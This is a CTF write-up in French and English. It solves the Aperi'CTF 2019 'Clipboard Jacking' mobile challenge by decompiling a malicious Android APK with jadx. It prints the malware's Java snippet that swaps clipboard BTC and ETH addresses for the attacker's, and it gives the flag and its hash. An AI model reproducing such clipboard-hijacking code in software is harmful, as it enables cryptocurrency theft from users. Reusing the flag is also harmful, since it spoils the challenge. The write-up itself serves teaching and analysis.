+++
title = "Clipboard Jacking"
description = "Aperi'CTF 2019 - Mobile (50 pts)"
keywords = "Mobile, Crypto, Clipboardjacking, Clipboard, Jacking, WriteUp, CTF, Aperi'CTF, Apéri'CTF, Aperi'CTF, ApériCTF, Aperi'Kube, Apéri'Kube, AperiKube, ApériKube"
date = "2019-09-14T00:00:00+02:00"
weight = 20
draft = false
bref = "Aperi'CTF 2019 - Mobile (50 pts)"
toc = true
+++

# Aperi'CTF 2019 - Clipboard Jacking

### Challenge details

| Event                    | Challenge         | Category | Points | Solves      |
|--------------------------|-------------------|----------|--------|-------------|
| Aperi'CTF 2019           | Clipboard Jacking | Mobile   | 50     | 18          |

La communauté AperiWallet a été victime d'une campagne d'attaques ciblées.
Ces attaques se traduisent par la diffusion d'un malware implémentant du ClipboardJacking, afin d'altérer les transactions des utilisateur d'AperiWallet.
Un technicien a réussi à récupérer la charge malveillante envoyée aux membres de la communauté.
Votre but: récupérer les adresses de wallet crypto de l'attaquant.

Le flag est sous la forme APRK{SHA1(Adr1;Adr2)}

<u>**Note&nbsp;:**</u> 
- Les adresses sont à trier dans l'ordre alphabétiques et en minuscules
- Veillez à ne pas insérer de doublons

Challenge: [ClipboardJacking.apk](/files/aperictf_2019/clipboard_jacking/ClipboardJacking.apk) - md5sum: a2e19fddae214175ae8247021e21d174

### TL;DR
Load the apk file with jadx, read the source code and compute flag.

### Open the file with Jadx

```bash
jadx-gui ClipboardJacking.apk
```

![Jadx1.png](/img/aperictf_2019/clipboard_jacking/jadx1.jpeg)

### Search for the MainActivity

We can find the MainActivity of the application here:
`com > lemon.metamask > Activity > MainActivity`

![Jadx2.png](/img/aperictf_2019/clipboard_jacking/jadx2.jpeg)

### Adresses identification

We can identify multiple addresses at line 74:
```java
if (valueOf.equals("1") && length == 34) {
    clipboardManager.setPrimaryClip(ClipData.newPlainText("btc", "1Pha3yFmC7pDafzrK2wtNfnjLUeAooJsYz"));
} else if (valueOf.equals("3") && length == 34) {
    clipboardManager.setPrimaryClip(ClipData.newPlainText("btc", "1Pha3yFmC7pDafzrK2wtNfnjLUeAooJsYz"));
} else if (valueOf2.equals("0x") && length == 42) {
    clipboardManager.setPrimaryClip(ClipData.newPlainText("eth", "0x1e0e276d26bc6bca54cc73e00f01f6ecb25a0e88"));
} else {
    Log.i("METAL", charSequence);
}
```

From this we can extract 2 addresses:
- BTC: 1Pha3yFmC7pDafzrK2wtNfnjLUeAooJsYz
- ETH: 0x1e0e276d26bc6bca54cc73e00f01f6ecb25a0e88

### Compute the flag

```bash
echo -n "0x1e0e276d26bc6bca54cc73e00f01f6ecb25a0e88;1Pha3yFmC7pDafzrK2wtNfnjLUeAooJsYz" | sha1sum
67ef366aee982ec98851b767573137aa6ab7b255
```

#### Flag

`APRK{67ef366aee982ec98851b767573137aa6ab7b255}`

[Zeecka](https://twitter.com/Zeecka_)
